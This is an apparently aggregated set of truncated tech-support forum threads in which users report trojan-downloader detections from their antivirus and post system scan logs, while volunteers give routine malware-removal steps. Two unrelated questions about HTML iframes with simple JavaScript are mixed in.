----REQUESTED DDS INFORMATION----

DDS (Ver_09-05-14.01) - NTFSx86
Run by Nick at 23:04:50.45 on Tue 06/16/2009
Internet Explorer: 8.0.6001.18702
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.2046.1175 [GMT -4:00]

AV: Lavasoft Ad-Watch Live! Anti-Virus *On-access scanning enabled* (Updated) {A1C4F2E0-7FDE-4917-AFAE-013EFC3EDE33}
AV: ESET Smart Security 4.0 *On-access scanning enabled* (Updated) {E5E70D32-0101-4F12-8FB0-D96ACA4F34C0}
FW: ESET Personal firewall *enabled* {E5E70D32-0101-4340-86A3-A7B0F1C8FFE0}

============== Running Processes ===============

C:\WINDOWS\system32&... Read more

A:Infected with SPR/Dldr.DigStream

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine.

If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll... Read more

Read other 2 answers

Hi I have recently installed I-tunes and all its components (Quicktime, Bonjour, etc) for my son's Ipod shuffle and when I launched Quicktime COMODO BOClean 4.26 kicked in saying dldr-zlob.nt malware stopped by boclean! location of startup: file c:\program\files\qt\qtsyst\exportcontroller.exe. This trojan horse program was found on your machine. It has been shut down, but the FILE from which it started still remains and can be started up again. Do you still want the file removed also? YES or NO. I am running windows XP.

A:dldr-zlob.nt detected

Hello and to BleepingComputer.

Let's see what we're dealing with here.

Please download RKill by Grinler from one of the 4 links below and save it to your desktop.
Link 1
Link 2
Link 3
Link 4

Before we begin, you should disable any anti-malware software you have installed so it does not interfere with RKill running. This is because some anti-malware software mistakenly detects RKill as malicious. Please refer to this page if you are not sure how to disable your security software.

Double-click on Rkill on your desktop to run it. (If you are using Windows Vista, please right-click on it and select Run As Administrator)
A black screen will appear and then disappear. Please do not worry, that is normal. This means that the tool has been successfully executed.
If nothing happens or if the tool does not run, please let me know in your next reply

***************************************************

Please download Malwarebytes Anti-Malware and save it to your desktop.
alternate download link

IMPORTANT!!! - when you save the file, rename it to something random, such as bubbles.exe This must be done before beginning the download!

MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.

Make sure you are connected to the Internet.
Double-click on mba... Read more

Read other 1 answers

Hi

Recently I have been experiencing some problems with my computer, such as it running slow and not shutting down easily. Also, I can connect to my wireless internet connection with a signal strength of good-excellent but my computer will not allow me to access or use the internet in any way, it is as if it is offline.

I have run AntiVir Guard, Ad-Aware and Ewido antivirus programs. Between them they have come up with a list of viruses that I am infected with but I believe that there are more. I have tried to delete these viruses but have not been able to and I have not been able to find the sources either. I am currently in the process of trying to get rid of Adware.Istbar using BC's self-help section but am not succeeding.

The viruses that I can find are
TR/Dldr.Swizzor.CO
TR/Dldr.Swizzor.bo
TR/Dldr.Swizzor.CN
TR/Dldr.Swizzor.cb
TR/Dldr.IstBar.KP

My computer is a Vaio laptop with Windows XP

I would like to rid my computer of these and all other viruses, can you please advise me on how I should do this and how I should prevent further Trojan Horses from attacking my computer.

Thanks,
Ellen

A:How Do I Remove Tr/dldr.swizzor.co ?

Try the steps and programs here

Read other 2 answers

Today I used a bookmark to go to a site I've been to before. My computer gave a single beep even though the sound was off. Then AntiVir Guard popped up saying it found HTML/Dldr.Agen.QV.7 but it had no information for it. Neither did a search for it have any information. Does anyone know what this is? I quarantined it.

Thanks
vano
 

A:HTML/Dldr.Agen.QV.7

Where was it found? In the Content.IE5 folder?
 

Read other 3 answers

Hi,
I have Antivir running on my Win XP-home and a couple of days ago it reported "Trojan TR/Dldr.Small.hme" on C:\windows\system32\pmnmmlj.dll. AntiVir is then offering a couple of choices (delete, deny access, delete on startup ...) but nothing helps. This dll still remains on my computer.
After googling through the web I found a very similar problem on this site (557097-cannot-delete-infected-dll-used.html) where a similar dll (concerning the dll name) could not be removed. In that thread I think cookiegal constructed a special registry key to be able to stop some service and remove the dll. But I have no idea how to create this registry key (but maybe I am completely wrong). So here is my hijackthis log and I also attached a winpfind3.log (these are from 9th January as I was not at home till now, but the system did not run in between)
Hope anybody can help me!! Thanks in advance!
Logfile of HijackThis v1.99.1
Scan saved at 23:20:30, on 09.01.2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Programme\Windows Defender\MsMpEng.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\explorer.exe
C:\Dokumente und Einstellungen\paul\Desktop\Troja\H.exe

F3 - REG:win.ini: load=C:\WINDOWS\system32\pmnnl.exe
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9...

A:Trojan TR/Dldr.Small.hme


Hi, I'm running Windows 7 Home Premium on a Gateway Nv55C Intel Core i5 - 460m processor. I'm using Avira personal. I usually use Firefox to navigate and I have a 64 bit OS so couldn't run Gmer

Avira started popping up a message that TR/Dldr.Renos.PG.56 [trojan] had been found in my temp folder. After a little research I discovered this could hide in Npx.exe. In my temp folder I found Npw.exe, Npx.exe and Npy.exe. I tried to delete all of them (stupidly). Npx.exe could not be deleted as it was in use. So I started task manager, went to processes, found Npx.exe*32 and stopped it. Then immediately deleted it. As far as I know it shouldn't be showing up in there so I figured this was the source of the virus. I then emptied my Temp folder and my recycle bin. After a restart, windows security centre would not turn on. To fix this I went into services.msc to enable it. Services.msc would not start due to a problem with Active X (another sign of a virus I believe). So I used Regedit and navigated to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ &
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
One of them had a registry L in it (I forget which) so I deleted that. Services.msc would now run. So then I went in and set security centre from disabled to automatic. This worked for a few seconds but then it was disabled again. I tried delayed auto too and the same thing happened. Syste...

A:TR/Dldr.Renos.PG.56 [trojan]

Bump
 


Hello, my antivirus (Avira) keeps giving me a warning that I have a trojan called TR/Dldr.Agent.apzz, and no matter what I do it comes back in about a quarter of a second.

How can I remove it for good?
It keeps making a new file and moving to that file whenever I try to delete it or move it to a quarantine, and when I tried to delete the file directly the computer gave me an access denied message.
 

A:TR/Dldr.Agent.apzz

Hi and welcome to TSG,

The General Security forum is only for general questions regarding security software and things of that nature but not for actually removing malware as we have qualified helpers who are the only members who are authorized to assist with those matters. You can easily identify them as they have either a gold or blue shield beside their usernames. Please refer to this excerpt from the rules:

Log Analysis/Malware Removal - In order to ensure that advice given to users is consistent and of the highest quality, those who wish to assist with security related matters must first graduate from one of the malware boot camp training universities or be approved by the administration as already being qualified. Those authorized to help with malware issues have a gold shield next to their name and authorized malware removal trainees have a blue shield next to their names. Anyone wishing to participate in a training program should contact a Moderator for more information.

I'm going to close this thread and ask you to repost in the Malware Removal & HijackThis Logs forum for the proper assistance.
 


Thank you Bleeping Computer for any assist: I wonder if I should un-install the Avira AntiVir Personal-Free and start again following your I Am Infected instructions? I keep getting a variety of web Pop-Ups and unusually slow and bizarre computer performance - and when in Task Manager I try to end the particular web pop-up it shuts down the Internet Explorer browser page as if they are linked. I installed the Avira AntiVir Personal-Free last week -- brief summary:

2346 Scanning directories
92356 Files were scanned
23 viruses and/or unwanted programs were found
0 Files were classified as suspicious:
2 files were deleted
0 files were repaired
13 files were moved to quarantine
0 files were renamed
2 Files cannot be scanned
92331 Files not concerned
484 Archives were scanned
7 Warnings
15 Notes

The Avira offers a choice to "delete" or "move to quarantine". I do not know if they are deleting an infection -or- an important system 32 file e.g.
C:\WINDOWS\System32\__c00C7BAA.dat
C:\WINDOWS\SYSTEM32\IASRAD32.DLL

I did choose at that first scan to 'delete' twice - until I started wondering what it meant - but those infected files did not seem to delete after all because I keep getting alerts about them still. I am getting bombarded by Avira Guard Alerts and need to keep quarantining the same 2 types:

Virus or unwanted program 'TR/Dldr.VMC.1 [trojan]' detected in file 'C:\W...

A:Avira Detected Tr/spy.gen V Tr/dldr.vmc.1 Plus More

Hi Karen,

"I wonder if I should un-install the Avira AntiVir Personal-Free and start again following your I Am Infected instructions?"

I wouldn't just yet. Just make sure it is updated!

Please download Malwarebytes Anti-Malware and save it to your desktop.
alternate download link 1
alternate download link 2
Make sure you are connected to the Internet.
Double-click on mbam-setup.exe to install the application.
When the installation begins, follow the prompts and do not make any changes to default settings.
When installation has finished, make sure you leave both of these checked:
    Update Malwarebytes' Anti-Malware
    Launch Malwarebytes' Anti-Malware
Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan.
If an update is found, the program will automatically update itself.
Press the OK button to close that box and continue.
If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install.

On the Scanner tab:
Make sure the "Perform Quick Scan" option is selected.
Then click on the Scan button.
If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results...


Hi,

I have a website that recently had some malicious code injected into the home page. The hosting company looked into this for me and sent me this reply:

It appears that malicious code has been uploaded to your account via FTP using a compromised username and password. At this time, I have removed the malicious code from the account. From our experience with malware of this nature, the user account passwords are compromised though viruses/malware located on your local computer. This malware sniffs out passwords used and stored by FTP programs located on the computer. In order to protect against future attack, you will need to run full virus and malware scans on your computers to ensure that they are clean. I recommend using multiple scanners as we have found that some scanners do not detect the malware. MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ) have been reported to be able to clean this malware.

I have downloaded malwarebytes and run the scan, it found several issues and cleaned them. This is the log for that:

Malwarebytes' Anti-Malware 1.37
Database version: 2295
Windows 5.1.2600 Service Pack 3
17/06/2009 14:53:17
mbam-log-2009-06-17 (14-53-17).txt
Scan type: Full Scan (C:\|)
Objects scanned: 249698
Time elapsed: 50 minute(s), 20 second(s)
Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 20
Registry Values Infected: 2
Registry Data Items Infected: 0
Folders Infected: 0...

A:I have 'TR/Dldr.Agent.HBR.2 [trojan]'

Hi,

Strange they advise ComboFix, because that's a tool that should be used under supervision of a HJT Team Member. I suggest you tell this to your hosting company.

Now, please do a full scan with MBAM, and post the results.


I'm infected with the TR/Dldr.fraudlo.sxm virus. Is there someone that can help me out?


I found your site on google, and there was a similar problem but the topic is closed...
For several months I'm trying to get rid of TR/Dldr.Swizzor.Gen2. I've tried different antivirus programs (Avira, Kaspersky, Nod...) and now the last option is to take the computer on re-installation and cleaning... You are my last chance!!!
Deleted, in quarantine, ignored... however, he always returns... 5-6 times a day. I am now at the stage of scanning computer 3 times a day, because I don't know what to do... so at least I have the feeling of doing something even though I know this doesn't solve anything...
My computer is now slow (although it is new), half of the program is not working, and the other half was apparently not installed correctly... To remind, the laptop is new (5-6 months old) and the first month everything is working properly. When the first problem appeared with him came and TR/Dldr.Swizzor.Gen2. Now the situation is worse every day, the computer is slower, every day TR/Dldr.Swizzor.Gen2 appears at least one time more than yesterday, programs are increasingly difficult to use, and I'm seriously losing my nerves!!!
Do you have any idea?
Please help me!!!

A:TR/Dldr.Swizzor.Gen2

The process of cleaning your computer may require you to temporarily disable some security programs. If you are using SpyBot Search and Destroy, please refer to Note 2 at the bottom of this page.

Please download Malwarebytes Anti-Malware Free version and save it to your desktop.
NOTE: Before saving MBAM please rename it to zztoy.exe....now save it to your desktop.
alternate download link 1
alternate download link 2
Make sure you are connected to the Internet.
Double-click on mbam-setup.exe to install the application.
When the installation begins, follow the prompts and do not make any changes to default settings.
When installation has finished, make sure you leave both of these checked:
    Update Malwarebytes' Anti-Malware
    Launch Malwarebytes' Anti-Malware
Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan.
If an update is found, the program will automatically update itself.
Press the OK button to close that box and continue.
If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install.

On the Scanner tab:
Make sure the "Perform Quick Scan" option is selected.
Then click on the Scan button.
If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
When the scan is finished, a message ...


I believe this started with a Lime Wire update, at least it started shortly after. AntiVir detected "TR/Dldr.Small.dxm.4" so I put it in Quarantine for now. File name is C:/a.exe. LimeWire now starts by itself even after I close it and Exit from the Task Bar. I uninstalled LimeWire but it still opens but not showing up in Add/Remove programs. Also Spybot finds nothing in scan but warning box constantly pops up warning of a Key Reg change that is being blocked.

Step 1) I found none of listed malware
Step 2) Panda will not scan w/Vista
Step 3) Already had both Spyware Blaster and IE-Spyad
Step 4) Auto Update on - no new updates
Step 5) Ran Deckard and HijackThis

PC Wizard 2007 Version 1.73
------------------------------------------------------------------------------------------

Owner: adam
User: ADAM SR
Operating System: Windows Vista (TM) Ultimate Professional 6.00.6000
Report Date: Thursday 25 October 2007 at 21:40

------------------------------------------------------------------------------------------


<<< System Summary >>>

> Mainboard : Acer Navarro

> Chipset : ATI Radeon RS482

> Processor : AMD Turion 64 Mobile ML-38 @ 2200 MHz

> Physical Memory : 2048 MB (2 x 1024 DDR2-SDRAM )

> Video Card : ATI Technologies Inc Radeon XPRESS 200M SERIES

> Hard Disk : TOSHIBA (120 GB)

> DVD-Rom Drive : MATSHITA DVD-RAM UJ-850S ATA Device

> Monitor Type : 20 inches
...

A:[SOLVED] TR/Dldr.Small.dxm.4

bump.


I am working on a site using an IFrame. It is a copy of another site I have using the same IFrame. In the original site the homepage shows up on load but on the reworked site it loads the home page and then it disappears. I am using IE to view these pages.

A friend said he looked at the site in FireFox and it works correctly, so it leads me to believe it may be an IE thing but the original site works fine in IE.

I am out of ideas here. HELP!
 

A:IFrame help

Post the site's URL and I will check out the code....... if I can see it.

d.
 


Still I frame. I have an Iframe on my site and I wanted to show only a certain part of the site inside it and unscrollable too. Can I tell the browser(s) to do this, and how? Please help.
 

A:Still Iframe - Please Help

Q: iframe

How do I clear the iframe in Netscape 7.0 and Internet Explorer? The following code works in IE but not in Netscape:

<html>
<head>
<title>Simple Math Practice</title>


<script language="javascript" type="text/javascript">
<!-- Hide Script
function RandPosInt() {
Rnum = Math.round(Math.random()*8+1);
return Rnum;
}

function WriteHeader() {
problem.document.write('<html><head><link href="math.css" rel="stylesheet" type="text/css"><\/head><body>');
}

function WriteContent() {
problem.document.write("this is content");
}

function WriteFooter() {
problem.document.write("<\/body><\/html>");
}

function ClearFrame() {
problem.document.open();
problem.document.clear();
}

function CloseFrame() {
problem.document.close();
}


// End Hiding Script -->
</script>


<link href="math.css" rel="stylesheet" type="text/css">
</head>
<body>
<div align="center">
<h1>Simple Math Practice</h1>

<iframe
src="defaultframe.html" id="problem" name="problem" frameborder="1" marginwidth="10" marginheight="10" scrolling="no" align="top" height="200" width="...

A:iframe

That function is no longer supported. See here:
http://www.web-developer-india.com/web/jscript/refp_77.html
 


G'Day everyone. Below is my log of HJ. I will also post my Malwarebytes Anti-malware log just in case. This problem started maybe 5 days ago while looking at bedroom sets. At that time AVG 8.0 was running; it caught a few things, some of which were healed, others were not. I installed the Malware w/o difficulty, updated, scanned and deleted only 2-3 objects (all Trojans), also installed the typical line up: Spybot, HJthis, CCleaner, Ad-aware. DL'd but did not install Windows bit defender and uninstalled AVG 8.0 to install Avira. I did this because I was not confident in AVG's ability to find/remove as much as Avira. Lastly, I did the free online scans from: McAfee & Norton. At this point I can't be sure this computer is "junk" free. I have gone 2 days without detections even with the constant scanning; this was done in both safe and normal mode. Today I received the above detection approximately 5 times. Each time I elected to delete. I assume this was done as Avira has not popped up with another detection. Have a look, give me your opinion. As a last note, I have researched the above Trojan with better results than the earlier detections. I have DL'd Smitfraudfix; I will not run this program until hearing back on this site. Thanks for everyone's help.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:04:00, on 4/23/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\Sy...

A:Latest Detection: JS/Dldr.Agent.Agr.1

Hello and welcome to Bleeping Computer.

My name is km2357 and I will be helping you to remove any infection(s) that you may have.

I will be giving you a series of instructions that need to be followed in the order in which I give them to you.

If for any reason you do not understand an instruction or are just unsure then please do not guess, simply post back with your questions/concerns and we will go through it again.

Please do not start another thread or topic, I will assist you at this thread until we solve your problems.

Lastly the fix may take several attempts and my replies may take some time but I will stick with it if you do the same.

I will be back as soon as possible with your first instructions!

Sorry for the delay in replying, the forum is very busy. If you still need help, please post a fresh HiJackThis Log
